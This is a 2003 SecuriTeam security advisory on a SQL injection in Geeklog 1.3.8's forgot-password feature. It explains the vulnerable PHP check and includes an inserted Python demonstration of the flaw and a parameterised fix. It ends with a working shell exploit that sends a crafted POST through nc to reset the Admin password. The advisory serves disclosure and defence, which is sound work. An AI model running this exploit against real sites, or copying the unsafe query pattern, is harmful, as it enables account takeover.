[EXPL] Geeklog SQL Injection Exploit Code
From: SecuriTeam (support_at_securiteam.com)
Date: 10/19/03
To: list@securiteam.com Date: 19 Oct 2003 19:22:14 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
SUMMARY
Following is an example of how MySQL SQL injections can be exploited and
how suppressing error messages is not sufficient as a solution. The
example application in this case is Geeklog (http://www.geeklog.net/), a
'blog' (otherwise known as a Weblog).
DETAILS
Vulnerable systems:
* Geeklog version 1.3.8-1sr1 down to 1.3.8
Immune systems:
* Geeklog version 1.3.8-1sr2
The exploit below uses the "forgot password" feature introduced in Geeklog
1.3.8. By constructing a certain kind of HTTP request, an attacker can
change any user's Geeklog password, including the administrator password.
This is because of an SQL injection problem. In users.php we have this kind
of code (at about line 750):
if (!empty($uid) && is_numeric($uid) && !empty($reqid)) {
    // $uid must be numeric, but $reqid only has to be non-empty
    $valid = DB_count($_TABLES['users'], array('uid', 'pwrequestid'),
                      array($uid, $reqid));
    if ($valid==1) {
        // generate an md5 hash for the new password and change it
    } else {
        // invalid request, display error message
    }
}
The database module layer hides the actual SQL queries and this does not
look very clear yet, but if we log all SQL queries executed, we see that
the above code produces this SQL (with e.g. $uid=2 and $reqid=3):
SELECT COUNT(*) FROM gl_users WHERE uid = '2' AND pwrequestid = '3'
The password is changed only if the count returned by this query is
exactly one. The only check done for $reqid is that it is not empty. It
can contain anything, so if $reqid is changed to e.g. "3' or uid='1", the
SQL server will get this query instead:
SELECT COUNT(*) FROM gl_users
WHERE uid = '2' AND pwrequestid = '3' or uid='1'
The pwrequestid = '3' condition is false unless the admin user really
forgot the password and uses this feature at the same time (very
unlikely). However, because of the "or uid='1'" part, the query will still
return one, because a user with uid=1 exists (the Anonymous user). So, the
$valid variable in the above code is set to one and the password is
changed.
This of course has nothing to do with displaying error messages. The
exploit does not produce any error message because the SQL code above is
correct.
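To show why the injected predicate is simply true rather than an error, and what the fix looks like, here is an added Python example (not part of the advisory or of Geeklog) that rebuilds the logged query against an in-memory SQLite copy of gl_users. The table contents and the assumed md5-shaped format of pwrequestid are constructed for the example.

```python
import re
import sqlite3

# Constructed stand-in for Geeklog's gl_users table: uid 1 is the Anonymous
# user, uid 2 the Admin, and no password reset is currently pending.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE gl_users (uid INTEGER, username TEXT, pwrequestid TEXT)")
    db.executemany("INSERT INTO gl_users VALUES (?, ?, ?)",
                   [(1, "Anonymous", ""), (2, "Admin", "")])
    return db

def db_count_unsafe(db, uid, reqid):
    """Mirrors the query the advisory logged: values are pasted into the SQL text,
    so a quote inside reqid ends the literal and the rest becomes SQL."""
    sql = f"SELECT COUNT(*) FROM gl_users WHERE uid = '{uid}' AND pwrequestid = '{reqid}'"
    return db.execute(sql).fetchone()[0]

def db_count_safe(db, uid, reqid):
    """Parameterised form: the driver binds the values, so quotes in reqid stay data."""
    sql = "SELECT COUNT(*) FROM gl_users WHERE uid = ? AND pwrequestid = ?"
    return db.execute(sql, (uid, reqid)).fetchone()[0]

# Assumption for this example: a request id is a 32-character hex md5 digest.
REQID_RE = re.compile(r"^[0-9a-f]{32}$")

def reset_allowed(db, uid, reqid):
    """Hardened check: validate both inputs (the original only validated uid),
    then run the bound query and require exactly one matching row."""
    if not uid.isdigit() or not REQID_RE.match(reqid):
        return False
    return db_count_safe(db, int(uid), reqid) == 1

if __name__ == "__main__":
    db = make_db()
    injected = "3' or uid='1"
    # Legitimate lookup with a stale id: no row matches.
    print(db_count_unsafe(db, 2, "3"))        # 0
    # Injected id: the OR clause matches the Anonymous row, count is 1.
    print(db_count_unsafe(db, 2, injected))   # 1
    # Same input through the bound query: still 0.
    print(db_count_safe(db, 2, injected))     # 0
    print(reset_allowed(db, "2", injected))   # False
```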
Jouko has informed the Geeklog developers about this and they have released
a fixed version, see http://www.geeklog.net.
Exploit:
#!/bin/sh
echo "POST /path/to/gl/users.php HTTP/1.0
Content-length: 50
Content-type: application/x-www-form-urlencoded
mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&" | nc localhost 80
This should change the Admin user's password to "new". You have to change
the /path/to/gl/users.php according to your Geeklog installation.
ADDITIONAL INFORMATION
The information has been provided by Jouko Pynnonen (jouko@iki.fi).